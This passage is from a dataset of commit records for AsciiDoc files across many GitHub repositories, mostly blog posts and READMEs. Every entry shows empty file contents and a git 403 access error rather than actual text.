update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87bdf0d5f7cb142804c9671004f908f1408eb47a","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a43d9d537f121a30db1c430c9a0e26cea4fcb409","subject":"Deleted 2016-12-1-re-Invent2016.adoc","message":"Deleted 
2016-12-1-re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-re-Invent2016.adoc","new_file":"2016-12-1-re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c9435be3397c27de6a46a1198aa996a9cd28aa2","subject":"Work on website data: community #1005","message":"Work on website data: community #1005\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topic\/community.adoc","new_file":"docs\/src\/main\/asciidoc\/topic\/community.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e44c5bf008df19e5663f300f22954a0fd7c3c658","subject":"Update 1901-01-02-About-Me.adoc","message":"Update 1901-01-02-About-Me.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/1901-01-02-About-Me.adoc","new_file":"_posts\/1901-01-02-About-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9f080032270a256f5b145c5ed5e971a71418af","subject":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","message":"Update 2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_file":"_posts\/2015-02-17-HubPress-Das-eigene-kostenfreie-Blog-uber-GitHub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b049a04437989355e751ff9088237e7a11c30f3","subject":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","message":"Update 2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_file":"_posts\/2016-04-06-Eficiencia-de-algoritmos-parte-I-en-el-principio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c971891999a270443cbe4d3c8e9336bf40b46c7","subject":"Update 2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","message":"Update 
2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","new_file":"_posts\/2016-05-05-Nautilus-File-Manager-scripts-Scale-J-P-G-images.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e6a95f20393200f0ce834720ee2e024226fb99a","subject":"y2b create post This Amazing Speaker Blends Into Its Surroundings","message":"y2b create post This Amazing Speaker Blends Into Its Surroundings","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-04-This-Amazing-Speaker-Blends-Into-Its-Surroundings.adoc","new_file":"_posts\/2016-07-04-This-Amazing-Speaker-Blends-Into-Its-Surroundings.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"626e1ccba60642c2075ba6395b52f7d5bee0df0a","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ccd2b48fd09296ae36b60e5b43775ec652ab5c1","subject":"Update 2017-02-25.adoc","message":"Update 2017-02-25.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25.adoc","new_file":"_posts\/2017-02-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14ee96c434d2e4d7edafda0d4bef98a747f06eda","subject":"Update 2014-04-18-Engaged-Invention.adoc","message":"Update 2014-04-18-Engaged-Invention.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_file":"_posts\/2014-04-18-Engaged-Invention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bbc82902fa8323b60f2843911e910c7c01e7a7d","subject":"Update 2017-09-24-Backdoor-CTF-2017.adoc","message":"Update 2017-09-24-Backdoor-CTF-2017.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e82673cfb45ed8d28fa9414f7f3e4a87a0e36a68","subject":"v1.78-2","message":"v1.78-2\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"009f70cec927e3d4b0761bb9cf8690928d9781fe","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5990f3c1699d77f00e056baeb90b3e9730d75499","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4ec9ece34ac69e59d18e357fad77e1302ec425d","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb3e92416b1556cffc70d2d95761e0506b2e1eea","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"047b65b8a3d748f884d5589d224fadd80f402881","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 
2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4accc55895b16f0f2318e1b6b3daf4a16561ff0e","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc\n","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"724a99ba19f6272d5f4320591b1b63a45f5655dc","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a483298dd77209a6274838719deda8a7d869a50","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75eaebe3adad5a7f0c7af026f772bc07ce312b76","subject":"Publish 2017-02-21.adoc","message":"Publish 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-21.adoc","new_file":"2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8be6048c224cdab749e34a2152a02562b8fa9a5","subject":"y2b create post CES 2013 VEGAS MEETUP!","message":"y2b create post CES 2013 VEGAS MEETUP!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-CES-2013-VEGAS-MEETUP.adoc","new_file":"_posts\/2013-01-10-CES-2013-VEGAS-MEETUP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d20068104520c2f5444f05660c9202e8182bdcd","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"147fdbf46234578037530f3745fb12effd81e3fc","subject":"Update 2015-09-15-HP-This-Isnt-a-Banner.adoc","message":"Update 2015-09-15-HP-This-Isnt-a-Banner.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-09-15-HP-This-Isnt-a-Banner.adoc","new_file":"_posts\/2015-09-15-HP-This-Isnt-a-Banner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b3466f2fdaf617c7cdddf79ffa9566faf5823ff","subject":"y2b create post 3 Cool Tech Deals - #13","message":"y2b create post 3 Cool Tech Deals - #13","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-26-3-Cool-Tech-Deals--13.adoc","new_file":"_posts\/2016-01-26-3-Cool-Tech-Deals--13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f95e41deff4b3fef960d5fa91fb227d46dd400c","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4018dc22f42112a8fdc200569088f1e6f928308","subject":"Update 2017-10-08-Installing-NPM-on-Mac.adoc","message":"Update 2017-10-08-Installing-NPM-on-Mac.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-08-Installing-NPM-on-Mac.adoc","new_file":"_posts\/2017-10-08-Installing-NPM-on-Mac.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed9c74d85c21d6a451ecdff96d70f7c16debb47a","subject":"Added hangouts blog post","message":"Added hangouts blog 
post\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2015-12-15-forge-3-hangouts.asciidoc","new_file":"news\/2015-12-15-forge-3-hangouts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"90f9c14a3b6d5942cf0397ba5a4da0e2bba6b498","subject":"Update 2017-09-17-4.adoc","message":"Update 2017-09-17-4.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2017-09-17-4.adoc","new_file":"_posts\/2017-09-17-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06222e3c2a8d8bef7122a4fdae88424ba87330c4","subject":"y2b create post Kindle Fire Road Trip","message":"y2b create post Kindle Fire Road Trip","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-15-Kindle-Fire-Road-Trip.adoc","new_file":"_posts\/2011-11-15-Kindle-Fire-Road-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2ff5ea589c8d2acada3bb5eb5813ba088892380","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90436933241ec43290524b6bdbe6c6e2a0be2fa","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1efaa3e99e55ca8959b8faeb72b4b68cb7e0833","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b81097b852a67eba38b01243d527c99a2c72b4d3","subject":"Update 2017-04-08-Time-To-Fly.adoc","message":"Update 
2017-04-08-Time-To-Fly.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-08-Time-To-Fly.adoc","new_file":"_posts\/2017-04-08-Time-To-Fly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d287a5965c244692ad200a84507688b94a85682","subject":"Update 2016-10-27.adoc","message":"Update 2016-10-27.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-10-27.adoc","new_file":"_posts\/2016-10-27.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a592d33c0b158a5f4367c013a4a20b2f265602b","subject":"Start german documentation using asciidoc.","message":"Start german documentation using asciidoc.\n","repos":"Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW,Midnight-Myth\/Mitternacht-NEW","old_file":"docs\/mitternacht.de.adoc","new_file":"docs\/mitternacht.de.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Midnight-Myth\/Mitternacht-NEW.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c37b07ef4cdb57d992287569976bfaa6ea9cb49","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17677fbfc9c13da0eb2b7df6ecfcd614cf7392e4","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"266e7b8e1f2b144b40b4880114762ae0c340182b","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"378871c2cdb083e3e799996765961b42892137b1","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"ggVGc\/TerseJS,ggVGc\/TerseJS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ggVGc\/TerseJS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2b8d576f59403439c91ecfbcdd5db12033dea3","subject":"Revert \"Try delete README.asciidoc to force GitHub re-generate the initial page\"","message":"Revert \"Try delete README.asciidoc to force GitHub re-generate the initial page\"\n\nThis reverts commit a96c878f7fc93a05ebd88054abed3861fec7342a.\n","repos":"smithed\/nanomsg,ttyangf\/nanomsg,simplestbest\/nanomsg,pch957\/nanomsg,kaostao\/nanomsg,reqshark\/nanomsg,potatogim\/nanomsg,pakozm\/nanomsg,pch957\/nanomsg,ttyangf\/nanomsg,reqshark\/nanomsg,featherweight\/ftw-kernel-nanomsg,modulexcite\/nanomsg,smithed\/nanomsg,wfxiang08\/nanomsg,reqshark\/nanomsg,TTimo\/nanomsg,hyperfact\/nanomsg,nirs\/nanomsg,wirebirdlabs\/featherweight-nanomsg,nirs\/nanomsg,zerotacg\/nanomsg,linearregression\/nanomsg,hyperfact\/nanomsg,imp\/nanomsg,kaostao\/nanomsg,krafczyk\/nanomsg,cosin2008\/nanomsg.NET,simplestbest\/nanomsg,pakozm\/nanomsg,wirebirdlabs\/featherweight-nanomsg,zerotacg\/nanomsg,nirs\/nanomsg,simplestbest\/nanomsg,linearregression\/nanomsg,imp\/nanomsg,gdamore\/mamomsg,linearregression\/nanomsg,pakozm\/nanomsg,tempbottle\/nanomsg,cosin2008\/nanomsg.NET,potatogim\/nanomsg,tempbottle\/nanomsg,modulexcite\/nanomsg,thisco-de\/nanomsg,JackDunaway\/featherweight-nanomsg,gdamore\/mamomsg,wfxiang08\/nanomsg,krafczyk\/nanomsg,yan97ao\/nanomsg,thisco-de\/nanomsg,wirebirdlabs\/featherweight-nanomsg,snikulov\/nanomsg,hyperfact\/nanomsg,krafczyk\/nanomsg,TTimo\/nanomsg,potatogim\/nanomsg,smithed\/nanomsg,zerotacg\/nanomsg,gdamore\/mamomsg,kaostao\/nanomsg,modulexcite\/nanomsg,JackDunaway\/featherweight-nanomsg,TTimo\/nanomsg,wfxiang08\/nanomsg,snikulov\/nanomsg,ttyangf\/nanomsg,cosin2008\/nanomsg.NET,ttyangf\/nanomsg,pch957\/nanomsg,TTimo\/nanomsg,featherweight\/ftw-kernel-nanomsg,yan97ao\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,tempbottle\/nanomsg,imp\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/featherweight\/ftw-kernel-nanomsg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7c4a6b355183b13ee06c52721779500e2eb3c0e","subject":"Add README for sgcollect_info (#3163)","message":"Add README for sgcollect_info (#3163)\n\n* Add README for sgcollect_info\r\n\r\n* ns_server link + Go version table\r\n\r\n* Update README.adoc\r\n\r\n* Address PR Feedback\r\n\r\n* Fix minor typos in sgcollect_info readme\r\n","repos":"couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway","old_file":"tools\/README.adoc","new_file":"tools\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 